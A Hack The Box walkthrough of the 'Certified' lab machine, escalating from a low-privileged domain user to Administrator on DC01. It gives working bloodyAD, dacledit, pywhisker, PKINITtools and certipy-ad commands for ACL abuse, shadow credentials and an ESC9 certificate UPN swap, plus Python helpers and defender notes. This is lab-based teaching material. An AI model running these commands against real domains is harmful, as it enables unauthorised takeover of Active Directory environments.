Certified HTB Writeup | HacktheBox
Achieved a full compromise of the Certified machine, demonstrating the power of leveraging misconfigurations and services in AD environments. This walkthrough is now live on my website, where I detail the entire process step-by-step to help others understand and replicate similar scenarios during penetration testing. Check it out to learn practical techniques and sharpen your skills!
2024-12-14 03:44:07 - xone
Initial Scenario
We begin the engagement with valid credentials for the user Judith Mader in the domain certified.htb. These were obtained from an earlier stage of the assessment:
Username: judith.mader
Password: judith09
User Account: judith.mader (Low privilege)
Target: Escalate from this low-privileged domain user to the built-in Administrator account on the domain controller DC01 (there is no "root" on a Windows host; full control of the DC is the goal).
Tools Utilized: nxc (NetExec), BloodHound, bloodyAD, dacledit.py (Impacket), pywhisker, PKINITtools (gettgtpkinit.py, getnthash.py), certipy-ad and Evil-WinRM.
Enumeration
Nmap Scan
An initial Nmap scan revealed several open ports on the domain controller (DC01):
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-22 17:02:33Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP over SSL
3268/tcp open  ldap          Microsoft Global Catalog
3269/tcp open  ssl/ldap      Microsoft Global Catalog over SSL
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open  mc-nmf        .NET Message Framing
Key observations:
Active Directory indicators: ports 88 (Kerberos), 389/636 (LDAP/LDAPS), 3268/3269 (Global Catalog) and 445 (SMB) identify the host as a Windows domain controller. Port 5985 (WinRM) is the remote shell used later in the chain.
SSL certificates: the LDAPS certificate names the host DC01.certified.htb and the domain certified.htb, and its issuer shows that an AD CS enterprise CA exists in the domain; the CA name, certified-DC01-CA, is the one used later when requesting certificates.
SMB signing: Nmap's smb2-security-mode script reports signing enabled and required, which rules out NTLM relay to SMB against this host.
Testing SMB Login
With the obtained credentials, SMB authentication was tested using nxc:
nxc smb $IP -u 'judith.mader' -p 'judith09'
Output:
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
The credentials were successfully authenticated against the SMB service, confirming low-privilege access to the domain.
LDAP Enumeration with BloodHound
To map the domain structure and discover potential attack paths, LDAP enumeration was conducted using nxc with BloodHound collection enabled:
nxc ldap dc01.certified.htb -u judith.mader -p judith09 --bloodhound --collection All --dns-tcp --dns-server 10.10.11.41
Output:
LDAP 10.10.11.41 389 DC01 [+] certified.htb\judith.mader:judith09
LDAP 10.10.11.41 389 DC01 Resolved collection methods: objectprops, session, localadmin, dcom, trusts, rdp, container, psremote, acl, group
LDAP 10.10.11.41 389 DC01 Done in 00M 33S
LDAP 10.10.11.41 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.10.11.41_2024-11-22_054454_bloodhound.zip
The output was successfully collected and compressed into a ZIP file, ready for BloodHound analysis.
BloodHound Analysis
The BloodHound graph revealed several key attack paths within the Active Directory environment:
- Judith Mader's permissions:
  - judith.mader has WriteOwner over the Management group. Whoever owns an object can rewrite its DACL, so this single right is enough to end up controlling the group's membership.
- Management group:
  - The Management group has GenericWrite over the management_svc account. GenericWrite covers the msDS-KeyCredentialLink attribute, which is what makes the shadow-credentials step below possible once judith.mader is a member of the group.
- management_svc:
  - management_svc has GenericAll over the ca_operator user, so it can add key credentials to ca_operator and rewrite attributes such as userPrincipalName.
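The three edges above are exactly what a BloodHound query walks. As an added example (my own code, not nxc's or BloodHound's), the script below reads objects in the shape of BloodHound's users.json/groups.json entries (ObjectIdentifier, Properties.name, Aces), inverts the inbound ACEs into outbound control edges and breadth-first searches for an abusable path from one principal to another. SAMPLE_OBJECTS is constructed: the SIDs are made up, and the three ACEs mirror the relationships listed above; the names load_bloodhound_zip, outbound_edges, find_path and plan are mine.

```python
"""Path finder over BloodHound-style ACL data (added example, not project code)."""
import json
import zipfile
from collections import deque

# Rights a tester can act on directly, and what this writeup does with each one.
ABUSABLE = {
    "WriteOwner": "take ownership (bloodyAD set owner), then grant yourself WriteMembers/WriteDacl",
    "WriteDacl": "grant yourself the rights you need with dacledit.py",
    "Owns": "rewrite the DACL as owner",
    "GenericAll": "full control: shadow credentials, password reset or attribute writes",
    "GenericWrite": "write msDS-KeyCredentialLink (pywhisker / certipy shadow)",
    "AddKeyCredentialLink": "write msDS-KeyCredentialLink (pywhisker / certipy shadow)",
    "AddMember": "add yourself to the group (bloodyAD add groupMember)",
    "ForceChangePassword": "reset the password",
}

# Constructed sample in the shape of BloodHound JSON "data" entries; SIDs are made up.
SAMPLE_OBJECTS = [
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1103",
     "Properties": {"name": "JUDITH.MADER@CERTIFIED.HTB"}, "Aces": []},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1104",
     "Properties": {"name": "MANAGEMENT@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1103", "PrincipalType": "User",
               "RightName": "WriteOwner", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1105",
     "Properties": {"name": "MANAGEMENT_SVC@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1104", "PrincipalType": "Group",
               "RightName": "GenericWrite", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-1106",
     "Properties": {"name": "CA_OPERATOR@CERTIFIED.HTB"},
     "Aces": [{"PrincipalSID": "S-1-5-21-1-1-1-1105", "PrincipalType": "User",
               "RightName": "GenericAll", "IsInherited": False}]},
    {"ObjectIdentifier": "S-1-5-21-1-1-1-500",
     "Properties": {"name": "ADMINISTRATOR@CERTIFIED.HTB"}, "Aces": []},
]


def load_bloodhound_zip(path):
    """Read every *.json inside an nxc/SharpHound zip and return all object entries."""
    objects = []
    with zipfile.ZipFile(path) as zf:
        for name in zf.namelist():
            if name.endswith(".json"):
                objects.extend(json.loads(zf.read(name))["data"])
    return objects


def outbound_edges(objects):
    """Invert inbound ACEs into {principal: [(target, right), ...]}."""
    names = {o["ObjectIdentifier"]: o["Properties"]["name"].upper() for o in objects}
    edges = {}
    for obj in objects:
        target = names[obj["ObjectIdentifier"]]
        for ace in obj.get("Aces", []):
            if ace["RightName"] in ABUSABLE:
                principal = names.get(ace["PrincipalSID"], ace["PrincipalSID"])
                edges.setdefault(principal, []).append((target, ace["RightName"]))
    return edges


def find_path(objects, start, goal):
    """Breadth-first search; returns [(principal, right, target), ...] or None."""
    edges = outbound_edges(objects)
    start, goal = start.upper(), goal.upper()
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for target, right in edges.get(node, []):
            if target not in parent:
                parent[target] = (node, right)
                queue.append(target)
    if goal not in parent:
        return None
    hops, node = [], goal
    while parent[node] is not None:
        principal, right = parent[node]
        hops.append((principal, right, node))
        node = principal
    return hops[::-1]


def plan(objects, start, goal):
    """Human-readable abuse plan, one line per hop."""
    path = find_path(objects, start, goal)
    if path is None:
        return [f"no abusable ACL path from {start} to {goal}"]
    return [f"{p} -[{r}]-> {t}: {ABUSABLE[r]}" for p, r, t in path]


if __name__ == "__main__":
    for line in plan(SAMPLE_OBJECTS, "judith.mader@certified.htb", "ca_operator@certified.htb"):
        print(line)
```

Against the real collection, call load_bloodhound_zip on the zip nxc wrote and pass the result to plan. Note that the search stops at ca_operator: the last hop to Administrator is not an ACL edge at all but the AD CS abuse covered in the root section, which is why BloodHound alone does not show the complete chain.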
User Privilege Escalation
1. Data Collection with nxc
- Action: Reviewed the nxc BloodHound collection and found that judith.mader holds WriteOwner over the "Management" group, the first link in the chain.
- Details: The zip produced by nxc was loaded into BloodHound and the outbound object control of judith.mader was inspected.
2. Setting Ownership
Used bloodyAD to make judith.mader the owner of the "Management" group (WriteOwner allows changing the object's owner, and the owner may then rewrite its DACL):
bloodyAD --host "$IP" -d "certified.htb" -u "judith.mader" -p "judith09" set owner Management judith.mader
3. Granting Write Permissions
As the new owner, granted judith.mader the WriteMembers right on the group with dacledit.py (the -action 'write' adds an ACE to the existing DACL rather than replacing it):
python3 dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09'
4. Adding to Management Group
With WriteMembers in hand, added judith.mader to the "Management" group, which gives her the group's GenericWrite over management_svc:
bloodyAD --host $IP -d 'certified.htb' -u 'judith.mader' -p 'judith09' add groupMember "Management" "judith.mader"
5. Exploiting KeyCredentialLink
Used pywhisker to add a key credential (a "shadow credential") to the msDS-KeyCredentialLink attribute of management_svc; the tool writes a new public key into the attribute and prints the path of the matching PFX file and its password, both of which are needed in the next step:
python3 pywhisker.py -d "certified.htb" -u "judith.mader" -p judith09 --target "management_svc" --action add
6. Obtaining a TGT
Authenticated with PKINIT using the PFX from pywhisker to obtain a TGT for management_svc. gettgtpkinit.py also prints the AS-REP encryption key, which is required to recover the NT hash in the next step:
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx /home/kali/HTB/Certified/pywhisker/pywhisker/loa78u6G.pfx -pfx-pass 2v752WSk3p8VJ1rYuYXT fuck.ccache
7. Recovering NT Hash
Extracted the NT hash of management_svc with getnthash.py (PKINITtools, not gettgtpkinit.py): with the ccache from the previous step exported in KRB5CCNAME, it performs a user-to-user (U2U) TGS request and decrypts the PAC credential info with the AS-REP key printed by gettgtpkinit.py:
python3 getnthash.py certified.htb/management_svc -key XXXXXXX41f6e9b55f2ce52b9922f38bff7e293ac3989a0XXXXXXXXXXXX
8. Logging in with Evil-WinRM
Logged in as management_svc over WinRM (port 5985) with Evil-WinRM, passing the recovered NT hash (the original used $NT-Hash, which is not a valid shell variable name):
evil-winrm -i $IP -u management_svc -H $NT_HASH   # $NT_HASH = management_svc hash from getnthash.py
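Step 5 is the pivot of this chain, and it helps to see what pywhisker actually writes. As an added example (my own code, not pywhisker, DSInternals or Microsoft code), the block below serialises and parses a msDS-KeyCredentialLink value following the KEYCREDENTIALLINK_BLOB layout from MS-ADTS section 2.2.20 (a 4-byte version 0x200 followed by length/identifier/value entries) and the DN-Binary syntax the attribute is stored in, and it verifies the two integrity hashes an entry carries. The key material, device id, timestamp and owner DN in the demo are constructed; a real entry carries an RSA public key, and possession of the matching private key is what the PKINIT logon in step 6 proves.

```python
"""msDS-KeyCredentialLink encoder/decoder (added example, not pywhisker's code)."""
import datetime
import hashlib
import struct
import uuid

KCL_VERSION = 0x00000200
ENTRY_NAMES = {
    0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
    0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
    0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime",
}
KEY_USAGE_NGC = 0x01    # "Next Generation Credentials", the usage shadow-credential tools write
KEY_SOURCE_AD = 0x00
_EPOCH = datetime.datetime(1601, 1, 1, tzinfo=datetime.timezone.utc)


def to_filetime(dt):
    """Windows FILETIME: 100 ns intervals since 1601-01-01 UTC (exact integer math)."""
    td = dt - _EPOCH
    return (td.days * 86400 + td.seconds) * 10_000_000 + td.microseconds * 10


def from_filetime(ft):
    return _EPOCH + datetime.timedelta(microseconds=ft // 10)


def _entry(ident, value):
    """One KEYCREDENTIALLINK_ENTRY: 2-byte LE length, 1-byte identifier, value."""
    return struct.pack("<HB", len(value), ident) + value


def build_key_credential(key_material, device_id, created):
    """KeyID = SHA256(KeyMaterial) for version 0x200; KeyHash = SHA256 of every entry after it."""
    ft = struct.pack("<Q", to_filetime(created))
    tail = (_entry(0x03, key_material) + _entry(0x04, bytes([KEY_USAGE_NGC]))
            + _entry(0x05, bytes([KEY_SOURCE_AD])) + _entry(0x06, device_id.bytes_le)
            + _entry(0x08, ft) + _entry(0x09, ft))
    return (struct.pack("<I", KCL_VERSION)
            + _entry(0x01, hashlib.sha256(key_material).digest())
            + _entry(0x02, hashlib.sha256(tail).digest()) + tail)


def to_dn_binary(blob, owner_dn):
    """DN-Binary syntax: B:<number of hex chars>:<hex>:<DN of the account>."""
    hexstr = blob.hex().upper()
    return f"B:{len(hexstr)}:{hexstr}:{owner_dn}"


def parse_dn_binary(value):
    tag, count, hexstr, dn = value.split(":", 3)
    if tag != "B" or int(count) != len(hexstr):
        raise ValueError("malformed DN-Binary value")
    return bytes.fromhex(hexstr), dn


def parse_key_credential(blob):
    """Return [(identifier, value, end_offset), ...] in wire order."""
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != KCL_VERSION:
        raise ValueError(f"unsupported KeyCredentialLink version {version:#x}")
    entries, off = [], 4
    while off + 3 <= len(blob):
        length, ident = struct.unpack_from("<HB", blob, off)
        off += 3
        entries.append((ident, blob[off:off + length], off + length))
        off += length
    return entries


def describe_key_credential(dn_binary_value):
    """Decode one attribute value and check both integrity hashes."""
    blob, owner_dn = parse_dn_binary(dn_binary_value)
    entries = parse_key_credential(blob)
    by_name = {ENTRY_NAMES.get(i, f"Unknown{i:#x}"): v for i, v, _ in entries}
    key_hash_end = next(end for i, _, end in entries if i == 0x02)
    return {
        "owner_dn": owner_dn,
        "device_id": str(uuid.UUID(bytes_le=by_name["DeviceId"])),
        "usage": "NGC" if by_name["KeyUsage"] == bytes([KEY_USAGE_NGC]) else by_name["KeyUsage"].hex(),
        "created": from_filetime(struct.unpack("<Q", by_name["KeyCreationTime"])[0]),
        "key_id_ok": by_name["KeyID"] == hashlib.sha256(by_name["KeyMaterial"]).digest(),
        "key_hash_ok": by_name["KeyHash"] == hashlib.sha256(blob[key_hash_end:]).digest(),
    }


# Constructed demo values; DEMO_KEY only stands in for a DER-encoded RSA public key.
DEMO_KEY = b"\x30\x82\x01\x22" + bytes(range(256)) + bytes(30)
DEMO_DEVICE = uuid.UUID("c6b2d6a4-0f0e-4b2c-9d1f-3a7e1c5b9a10")
DEMO_CREATED = datetime.datetime(2024, 11, 22, 17, 2, 33, tzinfo=datetime.timezone.utc)
DEMO_DN = "CN=management_svc,CN=Users,DC=certified,DC=htb"


def demo_value():
    return to_dn_binary(build_key_credential(DEMO_KEY, DEMO_DEVICE, DEMO_CREATED), DEMO_DN)


if __name__ == "__main__":
    for key, val in describe_key_credential(demo_value()).items():
        print(f"{key:>12}: {val}")
```

Run against real data, describe_key_credential is a quick defender-side check: pull msDS-KeyCredentialLink for an account with any LDAP client and look for entries whose DeviceId and KeyCreationTime do not correspond to a known Windows Hello enrolment. A service account like management_svc should normally have no entries at all.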
Root Privilege Escalation
1. Identifying GenericAll Rights
BloodHound showed that management_svc has GenericAll over ca_operator. On its own that only yields ca_operator, a low-privileged user; what makes it valuable is that ca_operator can enroll in the CertifiedAuthentication template on the enterprise CA, which opens a certificate-based path to Administrator.
2. Adding KeyCredential
Used certipy-ad's shadow auto to add a KeyCredential to ca_operator, authenticate as ca_operator with it via PKINIT, recover the account's NT hash with a U2U request and then remove the key again (the -hashes value is the management_svc hash from the previous section):
certipy-ad shadow auto -u management_svc@certified.htb -hashes $NT_HASH -account ca_operator
3. Updating UPN of ca_operator
Changed the userPrincipalName of ca_operator to administrator, without a domain suffix. A certificate requested from now on will carry administrator as the UPN in its Subject Alternative Name:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn administrator
4. Requesting Administrator Certificate
Requested a certificate from the CertifiedAuthentication template as ca_operator, authenticating with the ca_operator hash recovered by shadow auto (not the management_svc hash). The issued certificate will later be mapped to Administrator purely by the UPN in its SAN, which only works when the certificate is not strongly bound to the requesting account's SID; this is the condition Certipy documents as ESC9:
certipy-ad req -username ca_operator@certified.htb -hashes $CA_OPERATOR_HASH -ca certified-DC01-CA -template CertifiedAuthentication
5. Restoring Original UPN
Restored ca_operator's UPN before using the certificate. This ordering matters: if ca_operator still carried the UPN administrator, the KDC would map the certificate back to ca_operator instead of to the built-in Administrator account:
certipy-ad account update -u management_svc@certified.htb -hashes $NT_HASH -user ca_operator -upn ca_operator@certified.htb
6. Obtaining Administrator TGT
Authenticated to the KDC with the certificate. Certipy saves a TGT for Administrator to administrator.ccache and, through a U2U request, prints the NT hash of the Administrator account:
certipy-ad auth -pfx administrator.pfx -domain certified.htb
7. Logging in as Administrator
Logged in with Evil-WinRM as Administrator using the hash printed by certipy-ad auth:
evil-winrm -u administrator -H $ADMIN_HASH -i $IP   # $ADMIN_HASH = Administrator hash from certipy-ad auth
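Steps 3 to 6 only work because the DC maps the certificate to an account by the UPN in its SAN. As an added example (my own simplified model, not Certipy or Windows code), the block below encodes that mapping decision as the KB5014754 hardening describes it: a certificate carrying the account SID in the szOID_NTDS_CA_SECURITY_EXT extension (real OID 1.3.6.1.4.1.311.25.2) is strongly bound, one without it is only weakly bound by UPN and is accepted in Compatibility mode but refused once the DC runs in Full Enforcement. The lookup order (explicit userPrincipalName first, then a bare name against sAMAccountName) is a simplification of the KDC's behaviour, and the accounts, SIDs and certificates are constructed. It reproduces the writeup's sequence, shows what happens if the UPN is not restored, and shows why a template that embeds the SID defeats the swap.

```python
"""Model of certificate-to-account mapping for the UPN swap (added example, not Certipy code)."""
from dataclasses import dataclass, field
from typing import Optional

SID_EXT_OID = "1.3.6.1.4.1.311.25.2"   # szOID_NTDS_CA_SECURITY_EXT


@dataclass
class Account:
    sam: str
    sid: str
    upn: Optional[str] = None   # the built-in Administrator usually has no UPN set


@dataclass
class Cert:
    san_upn: str                                   # otherName UPN in the SAN
    extensions: dict = field(default_factory=dict)  # OID -> value


def lookup_by_upn(accounts, san_upn):
    """Explicit userPrincipalName match first; a bare name (no '@') falls back to sAMAccountName.
    Simplification of the KDC lookup, an assumption of this model."""
    wanted = san_upn.lower()
    for acct in accounts:
        if acct.upn and acct.upn.lower() == wanted:
            return acct
    if "@" not in wanted:
        for acct in accounts:
            if acct.sam.lower() == wanted:
                return acct
    return None


def map_certificate(cert, accounts, enforcement):
    """enforcement: 'compat' (KB5014754 default, weak maps allowed and logged as Event 39) or 'full'.
    Returns (account or None, reason)."""
    sid = cert.extensions.get(SID_EXT_OID)
    acct = lookup_by_upn(accounts, cert.san_upn)
    if acct is None:
        return None, "no account matches the SAN UPN"
    if sid is None:
        if enforcement == "full":
            return None, "rejected: certificate lacks the SID extension (strong mapping required)"
        return acct, "weak mapping by UPN only (Event 39 on the DC)"
    if acct.sid != sid:
        return None, "rejected: SID extension does not match the mapped account (Event 41)"
    return acct, "strong mapping: UPN and SID extension agree"


# Constructed directory; SIDs are made up.
DOMAIN = [
    Account("Administrator", "S-1-5-21-1-1-1-500"),
    Account("ca_operator", "S-1-5-21-1-1-1-1106", "ca_operator@certified.htb"),
]


def esc9_walkthrough(enforcement="compat"):
    """The writeup's sequence against the model; returns (mapped sAMAccountName, reason)."""
    ca_operator = DOMAIN[1]
    original_upn = ca_operator.upn
    ca_operator.upn = "administrator"          # step 3: certipy-ad account update -upn administrator
    issued = Cert(san_upn=ca_operator.upn)      # step 4: template that does not embed the SID
    ca_operator.upn = original_upn              # step 5: restore the UPN
    acct, reason = map_certificate(issued, DOMAIN, enforcement)   # step 6: certipy-ad auth
    return (acct.sam if acct else None), reason


def esc9_without_restoring_upn():
    """Skip step 5: the explicit UPN match wins and the cert maps back to ca_operator."""
    ca_operator = DOMAIN[1]
    original_upn = ca_operator.upn
    ca_operator.upn = "administrator"
    acct, _ = map_certificate(Cert(san_upn="administrator"), DOMAIN, "compat")
    ca_operator.upn = original_upn
    return acct.sam if acct else None


def esc9_with_sid_extension():
    """Hardened template: ca_operator's SID rides in the certificate, so the swap is refused."""
    issued = Cert(san_upn="administrator", extensions={SID_EXT_OID: DOMAIN[1].sid})
    acct, reason = map_certificate(issued, DOMAIN, "compat")
    return (acct.sam if acct else None), reason


if __name__ == "__main__":
    print(esc9_walkthrough("compat"))
    print(esc9_walkthrough("full"))
    print(esc9_without_restoring_upn())
    print(esc9_with_sid_extension())
```

The two failure cases are the practical caveats: forgetting step 5 hands you a ticket for ca_operator rather than Administrator, and on a DC with StrongCertificateBindingEnforcement set to Full Enforcement, or with a template that includes the SID extension, the request in step 4 produces a certificate that cannot be used this way at all.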
Summary
- Key steps:
  - WriteOwner on the Management group, used to take ownership, grant WriteMembers and add judith.mader to the group.
  - The group's GenericWrite on management_svc, used to plant a shadow credential, authenticate with PKINIT, recover the NT hash and log in over WinRM.
  - GenericAll on ca_operator plus a certificate template that is not strongly bound to the account SID, used to swap the UPN to administrator, obtain a certificate for Administrator and authenticate with it (ESC9).
Result: Full compromise of the Certified machine, with an Administrator shell on DC01.